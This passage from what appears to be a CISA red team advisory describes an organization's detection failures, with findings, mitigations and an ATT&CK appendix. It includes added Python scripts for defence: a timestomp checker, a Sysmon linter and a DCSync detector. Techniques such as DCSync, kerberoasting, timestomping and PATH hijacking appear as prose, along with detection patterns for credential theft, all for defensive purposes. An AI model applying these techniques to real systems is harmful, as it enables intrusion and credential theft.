The assessed organization had ineffective and insufficient logs, and network defenders were not using logs to proactively detect anomalous behavior. With the red team’s assistance, the organization identified logging issues caused by hardware failures, limited backups, network bandwidth, and limited log collection and retention policies (only 60–90 days). In other cases, critical data was captured but not analyzed because artifacts were moved to cold storage. The organization’s network defenders identified procedural and other roadblocks when attempting to acquire new forensic data. For example, affected servers could not be taken offline for imaging because there was no process in place to do so without impacting the organization’s operations. Additionally, attempts to capture forensic data via packet captures occurred directly on the compromised Solaris and Windows hosts, where the red team observed the data being collected and therefore had the opportunity to disrupt collection, tamper with evidence files, and better adapt to and evade the defenses.

Forensic Analysis

Defenders did not monitor C2 egress via DNS. They believed their parent entity was monitoring their DNS traffic, absolving them of a need to collect and monitor logs for their analyses. Forensic analysts blindly trusted the timestamps for files and persistence mechanisms without realizing they had been tampered with. Bogus times added to persistence mechanisms (such as scheduled tasks) led defenders to misjudge the timeline of the breach.
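Two of the Solaris artifacts discussed above (a binary masquerading under a monitored name where lastcomm records only the basename, and file timestamps rewritten with touch) can be reconciled against the filesystem itself. The script below is an added example, not CISA's tooling; the expected install path for splunkd is an assumption taken from the lastcomm example in the text, and the sample tree is constructed in a temporary directory.

```python
"""Host-integrity checks for the Solaris evasion described above, added as
an example (not CISA's tooling).

  * find_masquerades: lastcomm records only a basename, so a file named
    like a monitored binary but stored outside that binary's expected
    directory is reconciled here against the filesystem instead.
  * find_timestomped: touch -r (or an implant's timestomp) rewrites atime
    and mtime, but ctime is set by the kernel and cannot be chosen from
    user space, so an mtime far older than ctime is worth a second look.

The expected path for splunkd is an assumption taken from the example in
the text; the sample tree is constructed in a temporary directory."""
import os
import tempfile
import time

# Monitored basename -> expected location, relative to the scanned root.
EXPECTED_BINARIES = {"splunkd": "opt/splunkforwarder/bin/splunkd"}


def _walk_files(root):
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            yield os.path.join(dirpath, name)


def find_masquerades(root, expected=EXPECTED_BINARIES):
    """Relative paths of files that reuse a monitored basename elsewhere."""
    hits = []
    for path in _walk_files(root):
        rel = os.path.relpath(path, root)
        name = os.path.basename(path)
        if name in expected and rel != expected[name]:
            hits.append(rel)
    return sorted(hits)


def find_timestomped(root, min_gap_seconds=86400):
    """Relative paths whose ctime is more than min_gap newer than mtime.

    Triage signal only: package managers that preserve mtime, or a later
    chmod/chown (also used by the red team), widen the same gap, so confirm
    against the rest of the timeline before drawing conclusions."""
    hits = []
    for path in _walk_files(root):
        st = os.lstat(path)
        if st.st_ctime - st.st_mtime > min_gap_seconds:
            hits.append(os.path.relpath(path, root))
    return sorted(hits)


def _write(root, rel, data=b"\x7fELF stub\n"):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(data)
    return path


def build_sample_tree(root):
    """Constructed tree: the genuine splunkd, a masquerading copy one
    directory up, and an unrelated file. The copy's atime/mtime are then
    back-dated a year, as `touch -r <old reference file>` would do."""
    _write(root, "opt/splunkforwarder/bin/splunkd")
    fake = _write(root, "opt/splunkforwarder/splunkd")
    _write(root, "etc/motd", b"Welcome\n")
    a_year_ago = time.time() - 365 * 86400
    os.utime(fake, (a_year_ago, a_year_ago))   # ctime still says "now"


def run_demo():
    """Build the sample tree and return (masquerades, timestomped)."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return find_masquerades(root), find_timestomped(root)


if __name__ == "__main__":
    masquerades, stomped = run_demo()
    print("basename reused outside expected path:", masquerades)
    print("mtime far older than ctime:", stomped)
```

On a live host the same ctime/mtime comparison is what `ls -lc` versus `ls -la` shows by eye; the script just applies it tree-wide.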
Red team operators regularly adjusted the last-modified timestamp of files and folders, using either the native touch -r command or the implants’ timestomp command, to disguise the last-modified timestamp captured in the output of ls -la. Secondary file timestamps identified with ls -lu or ls -lc would have revealed abnormal file attributes, in addition to more reliable anomalies found during proper forensic investigation.

Reliance on Known IOCs

The red team used diversified TTPs in the Adversary Emulation phase to reflect the ability of cyber threat actors to bypass conventional, known-bad detection strategies. The network defenders did not detect much of the team’s activity. For example:

• After identifying a red team payload, network defenders wrote tailored YARA rules that signatured specific behavior of the red team’s loader, which uncovered several similar payloads but failed to catch any of the other six C2 frameworks.
• Organization network defenders used a combination of custom and open source detection rules (such as CommandLine=kerberoast* or files called bloodhound.zip) and did not detect the team’s kerberoasting activity.

Regular Monitoring and Investigation Management

Conversations with SOC leadership revealed several procedural issues that led to slow or incomplete analysis of the red team’s intrusion and activity. For example:

• While EDR products detected and quarantined several of the red team’s tools, including the initial phishing payload, the organization’s daily procedures did not always include review of EDR alerts. The red team worked with the organization to ensure rapid response to EDR alerts became a fundamental part of network defenders’ daily workflows. This allowed SOC personnel to identify new attempts at lateral movement.
• Solaris network owners discovered that several firewalls had inadvertently been misconfigured or disabled.
The organization’s technical teams worked directly with the red team to fix errors and to reorganize and revalidate the network topology.

Network defenders had poor operational security and alerted the red team to investigations. For example:

• In one instance, after receiving incoming beacons from what was evidently a sandboxed environment, the payload was not renamed from its original file, allowing the red team to immediately identify how much of their access was under scrutiny. Organizations must ensure sandboxed environments are safe, secure, and thoroughly sandboxed.
• The red team observed system administrators reviewing forensic artifacts tied to the team’s Solaris payload—searching for files, running packet captures for outbound C2 traffic, and port scanning the C2 redirector. Team members simply reinstalled their persistence with a new redirector and file path, sidestepping the informal investigation. IT teams were siloed from the SOC, which had no knowledge of the system administrator’s weeks-long investigation into the anomalous network behavior.
• While the organization compartmented most of its threat hunting and incident response in a separate domain, staff still used the compromised corporate domain accounts to communicate the details of active investigations and assessments.

Sysmon Misconfigurations

The red team had a productive exchange with the organization on their Sysmon configuration, which the team abused throughout the assessment. The red team identified several misconfigurations:

• Deployment teams pushed the ruleset (stored as a .xml file) to a globally readable C:\Windows directory. There were no rules in place to catch adversaries reading the configurations from disk or the registry. As a result, CISA’s red team was provided explicit file paths to safely place their payloads.
• Rules targeted a single, tool-specific IOC rather than a technique (e.g., sc.exe rather than service creation events).
• Exceptions were overly permissive (for example, excluding all Image entries anywhere in C:\Program Files (x86)\Google\Update\*).

LESSONS LEARNED AND KEY FINDINGS

The red team noted the following lessons learned and key findings relevant to the security of the assessed organization’s network. These specific findings contributed to the team’s ability to gain persistent access across the organization’s network. See the Mitigations section for recommendations on how to address these findings.

Lesson Learned: The assessed organization had insufficient controls to prevent and detect malicious activity.

Finding #1: The organization’s perimeter network was not adequately firewalled from its internal network, which failed to restrict outbound traffic. A majority of the organization’s hosts, including domain controllers, had internet connectivity to broad AWS EC2 ranges, allowing the red team to make outbound web requests without triggering IDS/IPS responses. These successful connections revealed the lack of an application layer firewall capable of detecting protocol mismatches on common ports.

Finding #2: The assessed organization had insufficient network segmentation. The lack of network segmentation allowed the red team to move into, within, and out of both the Solaris and Windows domains. This also enabled them to gather a massive amount of data about the organization and its systems. Internal servers could reach almost any other domain host, regardless of type (server vs. workstation), purpose (user laptop, file server, IDM server, etc.), or physical location. Use of network address translation (NAT) between different parts of the network further obfuscated data streams, hindering incident response.

Finding #3: The organization had trust relationships with multiple partner organizations, which—when combined with weak credentials and network connectivity—allowed the red team to exploit and move laterally to a partner domain controller.
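Returning to the Sysmon misconfigurations listed above (blanket exclusions such as the Google Update path, and include rules keyed on a tool name like sc.exe or a command-line keyword), these are properties of the XML that can be checked before a ruleset is pushed. The linter below is an added example, not CISA's or Sysinternals' code; its sample configuration is constructed, and only the Google Update exclusion mirrors the advisory text.

```python
"""Lint a Sysmon configuration for the rule-writing mistakes listed under
Sysmon Misconfigurations above: blanket exclusions, includes keyed on a
single tool name, and keyword command-line rules.

Added example; not CISA's or Sysinternals' code. SAMPLE_CONFIG is
constructed, and only its Google Update exclusion mirrors the advisory."""
import xml.etree.ElementTree as ET

# Conditions that, on an exclude rule, exempt whole directory trees or
# substrings rather than one exact binary.
BROAD_CONDITIONS = {"begin with", "contains", "contains any", "end with"}

SAMPLE_CONFIG = r"""<Sysmon schemaversion="4.90">
  <EventFiltering>
    <RuleGroup name="" groupRelation="or">
      <ProcessCreate onmatch="include">
        <Image condition="end with">sc.exe</Image>
        <CommandLine condition="contains">kerberoast</CommandLine>
        <Image condition="begin with">C:\Users\</Image>
      </ProcessCreate>
      <ProcessCreate onmatch="exclude">
        <Image condition="begin with">C:\Program Files (x86)\Google\Update\</Image>
        <Image condition="is">C:\Windows\System32\svchost.exe</Image>
      </ProcessCreate>
    </RuleGroup>
  </EventFiltering>
</Sysmon>"""


def lint_sysmon(xml_text: str):
    """Return a list of (kind, location, advice) tuples for a config."""
    findings = []
    for rule in ET.fromstring(xml_text).iter():
        onmatch = rule.get("onmatch")
        if onmatch not in ("include", "exclude"):
            continue                      # not an event-filter element
        for m in rule.iter():
            if m is rule or m.tag == "Rule":
                continue                  # <Rule> only groups matchers
            cond = (m.get("condition") or "is").lower()
            value = (m.text or "").strip()
            where = f"{rule.tag} {onmatch}: {m.tag} {cond} '{value}'"
            if onmatch == "exclude" and cond in BROAD_CONDITIONS:
                findings.append(("broad-exclusion", where,
                    "nothing matching this prefix/substring is ever logged; "
                    "exclude exact paths with condition=\"is\" instead"))
            elif (onmatch == "include" and m.tag in ("Image", "OriginalFileName")
                  and "\\" not in value and cond in ("is", "end with")):
                findings.append(("tool-specific-include", where,
                    "a renamed copy of the tool will not match; alert on the "
                    "behaviour (e.g. the service-install event) rather than "
                    "the binary name"))
            elif onmatch == "include" and m.tag == "CommandLine" and cond == "contains":
                findings.append(("keyword-include", where,
                    "keyword IOC; a different tool or framework will not match"))
    return findings


if __name__ == "__main__":
    for kind, where, advice in lint_sysmon(SAMPLE_CONFIG):
        print(f"[{kind}] {where}\n    {advice}")
```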
This highlights the risk of blindly allowing third-party network connectivity and the importance of regularly monitoring both privileged access and transitive trusted credential material.

Finding #4: The organization’s defensive staff did not sufficiently isolate their defensive investigative activity. Organizations should always communicate information pertaining to suspected incidents out-of-band, rather than from within a domain that they know to be compromised. While the defensive systems were shunted to another domain with correct (one-way) trusts, the red team identified a likely attack vector to that domain via the same, previously compromised IDM server. Some analysts also performed dynamic analysis of suspected implants from an internet-connected sandbox, tipping the red team to the specific files and hosts that were under investigation.

Finding #5: Network defenders were not familiar with the intricacies of their IDM solution. The CISA red team identified accounts not enrolled in the IDM and successfully used those and already existing user access tokens to bypass the IDM. The appliance, in its active configuration, was not exhaustively tested against common credential manipulation techniques, nor were any alerts on anomalous behavior being monitored.

Finding #6: The organization had some role-based host segmentation, but it was not granular enough. The organization used clearly defined roles (server administrator and domain administrator) but did not sufficiently segregate the accounts to their own servers or systems, enabling privilege escalation.

Lesson Learned: The organization did not effectively or efficiently collect, retain, and analyze logs.

Finding #7: Defensive analysts did not have the information they needed due to a combination of issues with collecting, storing, and processing logs. Other policies collected too much useless data, generating noise and slowing investigation.
Finding #8: Network defenders’ daily procedures did not always include analysis of EDR alerts, and the tools that were installed only provided 30-day retention for quarantined files. Consequently, investigators were unable to access timely information that may have led to earlier detection of the red team’s activity.

Finding #9: Forensic analysts trusted host artifacts that could have been modified by an adversary. In particular, file timestamps and packet captures were scrutinized without considering the possibility of malicious tampering.

Lesson Learned: Bureaucratic communication and decentralized teams hindered the organization’s network defenders.

Finding #10: The organization’s technical staff were spread across decentralized teams. The siloed team structure meant that IT, security, and other technical teams lacked consistency in their tools, creating too much noise for defenders to sift through.

Finding #11: The SOC team lacked the agency to rapidly update or deploy rulesets through the fractured IT teams. The organization diffused responsibility for individual tools, such as Sysmon, across multiple groups, hampering the timeliness and maintenance of its defensive posture.

Finding #12: The organization’s forensics team produced an incident response report which documented the red team’s initial exploitation of the Solaris enclave. However, the report was limited in scope and did not adequately document the red team’s ability to expand and persist. The success of the red team’s first phase, using publicly known TTPs, illustrated the business risk to all Solaris hosts and, by extension, the Windows environment. Moreover, the organization’s internal report only focused on vulnerable servers and did not account for a cyber threat actor’s ability to expand and persist in the Solaris enclave. The Solaris administrator’s investigations of the red team failed to appear in either the report or in SOC deconflictions.
An admin’s inquiry into unusual and probably malicious activity, particularly in the middle of an investigation of confirmed breaches of adjacent hosts, should have been considered in the report as evidence of lateral movement.

Lesson Learned: A “known-bad” detection approach hampered detection of alternate TTPs.

Finding #13: Defenders hyper-focused on specific IOCs, such as file attributes, particular C2 frameworks, or C2 domains. The organization’s network defenders did not initially employ tool-agnostic detections, causing them to positively identify some red team tools but remain blind to the full extent of the compromise. They were accustomed to catching internal red teams that used specific TTPs; introducing a new “threat actor” with new TTPs sidestepped nearly all detections.

Finding #14: Detection rules were visible from compromised systems, allowing the red team to sidestep detections based on hardcoded rules and exceptions.

Finding #15: There was insufficient restriction of administrative tools. The technical staff lacked a standardized set of administrative tools, leaving all remote administration protocols available for use by admins, the CISA red team, or adversaries. This also created excessive noise for defenders to sift through to determine expected versus anomalous activity.

Finding #16: There was insufficient tracking of software. There was no apparent approval or tracking process for software installation across the domain, preventing defensive analysts from identifying abnormal software placed by the red team. A comprehensive inventory of approved software would help defenders identify abnormal behavior and facilitate the deployment of application allowlisting.

NOTED STRENGTHS

The assessed organization promptly planned for and resolved multiple identified issues, including with:

• Windows service accounts: The organization eliminated over 30 percent of service accounts which were deemed unnecessary.
There is an ongoing effort to change service account passwords and apply DoD-recommended STIG compliance (over 85 percent have been changed since the publication of this report).
• IDM: The organization is looking into how to improve their IDM implementation and apply additional security alerts and preventions for possible misuse of credentials. They plan to implement additional identity-based monitoring capabilities in front of tier zero assets.
• Egress: The organization implemented new processes to detect and prevent servers from anomalously egressing outside of the network to the internet.
• Host-based solutions: The organization used additional features of their antivirus software, such as reputation scores, to look for all executable file type outliers and identify anomalous instances.
• Hosts: The organization decommissioned clusters of servers and completely rebuilt them from scratch after identifying numerous irreparable issues and misconfigurations.
• Solaris credentials: The organization changed passwords, removed SSH keys, restricted permissions, and removed unnecessary accounts.

MITIGATIONS

Network Defenders

CISA recommends organizations implement the recommendations in Table 1 to mitigate the findings listed in the Lessons Learned and Key Findings section of this advisory. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. See CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
Table 1: Recommendations to Mitigate Identified Issues

Finding: Inadequate firewall between perimeter and internal devices
Recommendation: Deploy internal and external network firewalls to inspect, log, and/or block unknown or unauthorized traffic. Perform deep packet inspection to detect mismatched application traffic or encrypted data flows. Restrict outbound internet egress to hosts whenever possible. Establish a baseline of normal user activity, including unique IPs or domains.

Finding: Insufficient network segmentation
Recommendation: Apply the principle of least privilege to limit the exposure of systems and services in the demilitarized zone (DMZ). Segment the DMZ based on the sensitivity of systems and services as well as the internal network [CPG 2.F]. Segment networks to protect assets and workstations from direct exposure to the internet by considering the criticality of the asset to business functions, sensitivity of the data traversing the asset, and requirements for internet access to the asset. Implement and regularly test firewalls, access control lists, and intrusion prevention systems. Take advantage of opportunities to create natural network segmentation. Securely configured VPNs used for remote laptops, for instance, create an easy place to filter and monitor incoming traffic.

Finding: Trust relationships between domains were overly permissive
Recommendation: Restrict network connectivity (ingress and egress) to only necessary services between trusted domains [CPG 2.E]. Regularly monitor privileged access via Foreign Security Principals (FSPs).

Finding: Defensive activity was not sufficiently isolated
Recommendation: Perform network defense investigations out-of-band [CPG 3.A]. Conduct regular security audits and penetration testing by internal and external parties. Develop and implement a comprehensive Incident Response Plan (IRP) and conduct regular drills and simulations [CPG 2.S].

Finding: IDM solutions were not fully understood and utilized
Recommendation: Enroll all accounts in IDM solutions and test against common credential manipulation techniques. Integrate the IDM solution with other systems and applications, allowing for the streamlining of workflows.

Finding: Insufficient role-based host segmentation
Recommendation: Establish Role-Based Access Controls (RBAC) to systematically assign permissions based on job functions [CPG 2.E]. Implement a comprehensive security model incorporating micro-segmentation at the host level.

Finding: Failure to monitor EDR alerts daily
Recommendation: Develop and document Standard Operating Procedures (SOPs) for handling EDR alerts [CPG 5.A]. Establish and maintain incident response playbooks. Conduct regular audits and reviews of the EDR alert handling process.

Finding: Host artifacts were overly trusted
Recommendation: Operationalize and deploy File Integrity Monitoring (FIM) solutions. Regularly review and adjust access permissions, adhering to the principle of least privilege [CPG 2.E]. Establish proper forensic processes to ensure integrity.

Finding: Bureaucracy and decentralization of network defenders hampered communication and consistency
Recommendation: Introduce cross-training initiatives to cultivate a collaborative culture. Encourage the establishment of cross-functional projects. Utilize collaboration platforms that seamlessly integrate various tools and systems.

Finding: Insufficient internal incident response report
Recommendation: Promote a culture of ongoing improvement while also fostering a proactive approach among employees to promptly report suspicious activities. Treat suspected incidents of compromise as a confirmed breach, and account for a threat actor’s ability to move laterally when defining the scope of incident response efforts.

Finding: Focus on known/common IOCs
Recommendation: Employ centralized logging and tool-agnostic detection methods. Leverage threat intelligence feeds by integrating them into a SIEM tool. Implement regular updates for IOCs and TTPs, with the capability for customization to address the specific threat landscape [CPG 3.A].

Finding: Detection rules were visible from compromised systems
Recommendation: Integrate runtime detection mechanisms while removing world-readable configuration files from installer deployments where applicable.

Finding: Insufficient restriction of admin tools
Recommendation: Enhance security posture by implementing application allowlisting to ensure only trusted and approved applications are permitted [CPG 2.Q]. Apply the principle of least privilege by granting users only the minimum level of access necessary to perform job functions.

Finding: Insufficient tracking of software
Recommendation: Conduct a comprehensive inventory of assets and establish a baseline for behavior [CPG 1.A]. Utilize a Software Asset Management (SAM) solution that offers comprehensive tracking, reporting, and compliance management capabilities. Deploy automated discovery and monitoring tools to continuously scan and identify new and existing software.

CISA recommends organizations implement the recommendations in Table 2 to mitigate other identified issues that can be uncovered through traditional penetration tests or red team assessments.

Table 2: Recommendations to Mitigate Identified Issues

Issue: Accounts were overprivileged and the organization’s network contained unnecessary service accounts
Recommendation: Apply the principle of least privilege when assigning permissions to user accounts. Audit existing group memberships, strip unnecessary privileges, and prune unnecessary nested groups/users. Monitor for account lockout, especially on administrative accounts, and switch to a manual account unlock policy. Increase monitoring for higher-risk accounts, such as service accounts, that are highly privileged and have a predictable pattern of behavior (e.g., scans that reliably run at a certain hour of the day). Privileged users should have dedicated role-based user accounts and associated jump hosts to log into critical resources.

Issue: Insufficient EDR configuration
Recommendation: Ensure all hosts have a form of EDR installed. Deploy an EDR capable of catching commonly known obfuscation or execution techniques.

Issue: Insecure and insufficient credentials
Recommendation: Ensure sensitive credentials and documents are not stored in an accessible place. Mandate strong and complex passwords [CPG 2.B]. For more information, see CISA’s Secure Our World: Require Strong Passwords.

Note: The above mitigations apply to critical infrastructure organizations with on-premises or hybrid environments. CISA encourages all organizations to prioritize purchasing products from manufacturers who demonstrate secure by design principles, such as evidenced by follow-on publications from companies who have signed the Secure by Design Pledge.

Software Manufacturers

CISA recognizes that insecure software is the root cause of many flaws; the responsibility should not rest on the end user. CISA urges software manufacturers to implement the following:

• Eliminate default passwords and determine what password practices should be required (such as minimum password length and disallowing known breached passwords).
• Configure software to use more secure authentication schemes by default.
• Provide logging at no additional charge. Cloud services and on-premises products should commit to generating and storing security related logs at no additional cost. Work with security information and event management (SIEM) and security orchestration, automation, and response (SOAR) providers—in conjunction with customers—to understand how response teams use logs to investigate incidents. The goal is to develop logs that yield a comprehensive story of the event.
• Remove unnecessary software dependencies. Unnecessary software increases the attack surface available to adversaries and may introduce additional vulnerabilities. Mitigating these additional vulnerabilities requires significant investment, consuming resources like time and technical personnel and adding to the level of security effort.
These mitigations align with tactics provided in the joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software. CISA urges software manufacturers to take ownership of improving the security outcomes of their customers by applying these and other secure by design tactics. By using secure by design tactics, software manufacturers can make their product lines secure “out of the box” without requiring customers to spend additional resources making configuration changes, purchasing security software and logs, monitoring, and making routine updates. For more information on secure by design, see CISA’s Secure by Design webpage. For more information on common misconfigurations and guidance on reducing their prevalence, see joint advisory NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory. To get started:

1. Select an ATT&CK technique described in this advisory (see Tables 3–11).
2. Align your security technologies against the technique.
3. Test your technologies against the technique.
4. Analyze your detection and prevention technologies’ performance.
5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
RESOURCES
- Layering Network Security Through Segmentation
- Recommended Practice: Improving Industrial Control System Cybersecurity with Defense-in-Depth Strategies
- Phishing Guidance: Stopping the Attack Cycle at Phase One
- BOFs Detecting DCSync
- App Domain Hijacking Overview

DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. CISA does not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA.

VERSION HISTORY
July 11, 2024: Initial version.

APPENDIX: MITRE ATT&CK TACTICS AND TECHNIQUES
See Tables 3–11 for all referenced threat actor tactics and techniques in this advisory.

Table 3: Reconnaissance (Technique Title | ID | Use)
Search Victim-Owned Websites | T1594 | CISA’s red team used open source tools and services to probe the organization’s internet-facing presence and gather information, including names, roles, and contact information.
Gather Victim Network Information: DNS | T1590.002 | The red team gathered information about the organization’s DNS records, which revealed several details about the organization’s internal network.
Gather Victim Identity Information: Employee Names | T1589.003 | CISA’s red team collected the assessed organizations’ employee names to use their email addresses for specific targeting based on roles and responsibilities.
Gather Victim Org Information: Identity Roles | T1591.004 | CISA’s red team selected specific individuals from the assessed organization and targeted them with phishing payloads.
Table 4: Command and Control (Technique Title | ID | Use)
Application Layer Protocol: Web Protocols | T1071.001 | The red team exploited CVE-2022-21587 and ran a RAT that provided consistent C2 via open Transmission Control Protocol (TCP) ports.
Non-Standard Port | T1571 | The red team used SSH over ports 80 and/or 443 when establishing outbound C2.
Proxy: Domain Fronting | T1090.004 | CISA’s red team leveraged domain fronting to redirect and obfuscate their traffic.

Table 5: Credential Access (Technique Title | ID | Use)
Brute Force: Password Cracking | T1110.002 | The red team cracked an account’s password by using a common wordlist.
OS Credential Dumping: DCSync | T1003.006 | CISA’s red team pulled credentials for the domain via DCSync to gain full access to the domain.
Unsecured Credentials: Bash History | T1552.003 | The red team obtained a password by searching a user’s bash command history, which provided further unprivileged access throughout the network.

Table 6: Discovery (Technique Title | ID | Use)
Domain Trust Discovery | T1482 | CISA’s red team inspected the assessed organization’s domain trust relationships through LDAP and identified potential connections in external organizations to which to move laterally.
File and Directory Discovery | T1083 | The red team data mined numerous internal servers and discovered one misconfigured share that contained plaintext usernames and passwords for several privileged service accounts.

Table 7: Privilege Escalation (Technique Title | ID | Use)
Hijack Execution Flow: Path Interception by PATH Environment Variable | T1574.007 | The red team hijacked the execution flow of a program that used a relative path instead of an absolute path, which enabled the capture of the account’s password.
Access Token Manipulation: Token Impersonation/Theft | T1134.001 | CISA’s red team impersonated the tokens of current users to exploit valid sessions and bypass the organization’s IDM.
Access Token Manipulation: Make and Impersonate Token | T1134.003 | CISA’s red team created new tokens and logon sessions for accounts not registered with the IDM to escalate privileges.

Table 8: Lateral Movement (Technique Title | ID | Use)
Remote Services: SSH | T1021.004 | CISA’s red team used SSH with a valid account to move through the enclave.
Proxy | T1090 | The red team used a SOCKS proxy to avoid direct connections to their infrastructure and obscure the source of the malicious traffic.
Use Alternate Authentication Material: Pass the Hash | T1550.002 | The red team’s operations were hindered by the organization’s IDM when it blocked the team’s attempts to bypass system access controls using different hash types for authentication.
Use Alternate Authentication Material: Pass the Ticket | T1550.003 | CISA’s red team’s operations were hindered by the organization’s IDM when it blocked the team’s attempts to bypass system access controls using Kerberos tickets for authentication.

Table 9: Collection (Technique Title | ID | Use)
Data from Local System | T1005 | CISA’s red team searched each host for files containing sensitive or interesting information such as password hashes, account information, network configurations, etc.

Table 10: Persistence (Technique Title | ID | Use)
Scheduled Task/Job: Cron | T1053.003 | The red team used the cron utility to perform task scheduling and execute malicious code within Unix systems at specified times.
Scheduled Task/Job: At | T1053.002 | CISA’s red team used the at utility to perform task scheduling and execute malicious code within Unix systems at a specified time and date.
Hijack Execution Flow: AppDomainManager | T1574.014 | The red team executed malicious payloads by hijacking how the .NET AppDomainManager loads assemblies.
Valid Accounts: Domain Accounts | T1078.002 | CISA’s red team regularly used compromised valid domain accounts managed by Active Directory, giving access to resources of the domain.
Table 11: Defensive Evasion (Technique Title | ID | Use)
Masquerading: Masquerade Task or Service | T1036.004 | The red team enumerated local files and running processes to gather information for their payloads and persistence mechanisms to appear as legitimate activity.
Obfuscated Files or Information | T1027 | CISA’s red team encrypted, encoded, and obfuscated their executables and C2 channels to evade defenses across the network.
File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification | T1222.002 | The red team modified file permissions with touch and chmod/chown commands to obfuscate their activity and blend in with other files in the environment.
Indicator Removal: Timestomp | T1070.006 | CISA’s red team modified file timestamps to hide their operational activity.
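The DCSync entry in Table 5 (T1003.006) is one of the techniques above that a defender can test a detection against concretely: DCSync is a directory replication request, so it surfaces as a Windows Security event 4662 in which a principal reads the domain object with the replication control-access rights. The following is an added example written for this advisory and is not CISA's code. The event records in it are constructed; the three GUIDs are the real Active Directory extended rights that replication requires, and the domain controller names and the `MSOL_sync` allow-listed account are assumptions for the sample.

```python
"""Spot likely DCSync activity (Table 5, T1003.006) in Windows Security
event 4662 records.

Added example for this advisory; not CISA's code. The event records below
are constructed. A principal that is neither a domain controller nor a known
replication service exercising the replication rights against the domain
object is the classic DCSync signal.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# Control-access right GUIDs required for DCSync (real AD values).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)


@dataclass
class Event4662:
    """The 4662 fields the check needs (names follow the event XML)."""
    subject_user_name: str   # who performed the operation
    object_type: str         # "domainDNS" when the target is the domain head
    properties: str          # the Properties blob listing access-right GUIDs


def replication_rights_used(ev: Event4662) -> List[str]:
    """Names of the replication rights present in the event's Properties blob."""
    found = {g.lower() for g in GUID_RE.findall(ev.properties)}
    return sorted(REPLICATION_RIGHTS[g] for g in found if g in REPLICATION_RIGHTS)


def detect_dcsync(events: Iterable[Event4662],
                  domain_controllers: Iterable[str],
                  allowed_sync_accounts: Iterable[str] = ()) -> List[Tuple[str, List[str]]]:
    """Return (subject, [rights]) for every 4662 where a principal that is
    neither a DC machine account nor an allow-listed sync account read the
    domain object with replication rights."""
    expected = {n.upper() for n in domain_controllers} | {n.upper() for n in allowed_sync_accounts}
    alerts = []
    for ev in events:
        rights = replication_rights_used(ev)
        if not rights or ev.object_type != "domainDNS":
            continue
        if ev.subject_user_name.upper() in expected:
            continue  # DC-to-DC replication (or a known sync service) is normal
        alerts.append((ev.subject_user_name, rights))
    return alerts


# Constructed sample events: one legitimate DC, one ordinary user exercising
# both Get-Changes rights, and one unrelated property read with a made-up GUID.
SAMPLE_EVENTS = [
    Event4662("DC01$", "domainDNS",
              "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
    Event4662("jdoe", "domainDNS",
              "Control Access\n\t{1131F6AA-9C07-11D1-F79F-00C04FC2DCD2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
    Event4662("svc_backup", "user",
              "Read Property\n\t{deadbeef-0000-4000-8000-000000000001}"),  # constructed placeholder GUID
]

if __name__ == "__main__":
    # Assumed DC names and an assumed allow-listed directory sync account.
    for subject, rights in detect_dcsync(SAMPLE_EVENTS, ["DC01$", "DC02$"], ["MSOL_sync"]):
        print(f"possible DCSync by {subject}: {', '.join(rights)}")
```

Event 4662 is only written when directory service access auditing is enabled and the domain object carries a SACL for the replication rights, so the check above is also a test of the logging prerequisite: if no 4662 appears for a controlled, authorized replication read, the detection has no data to work with. Keep the allow list short and reviewed; directory synchronization services legitimately hold these rights and are the accounts an intruder would most like to borrow.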

  • People’s Republic of China (PRC) Ministry of State Security APT40 Tradecraft in Action
    by CISA (CISA Cybersecurity Advisories) on 8 Luglio 2024 at 1:52 pm

    Overview

    Background
    This advisory, authored by the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), the United States Cybersecurity and Infrastructure Security Agency (CISA), the United States National Security Agency (NSA), the United States Federal Bureau of Investigation (FBI), the United Kingdom National Cyber Security Centre (NCSC-UK), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NCSC-NZ), the German Federal Intelligence Service (BND) and Federal Office for the Protection of the Constitution (BfV), the Republic of Korea’s National Intelligence Service (NIS) and NIS’ National Cyber Security Center, and Japan’s National Center of Incident Readiness and Strategy for Cybersecurity (NISC) and National Police Agency (NPA)—hereafter referred to as the “authoring agencies”—outlines a People’s Republic of China (PRC) state-sponsored cyber group and their current threat to Australian networks. The advisory draws on the authoring agencies’ shared understanding of the threat as well as ASD’s ACSC incident response investigations.

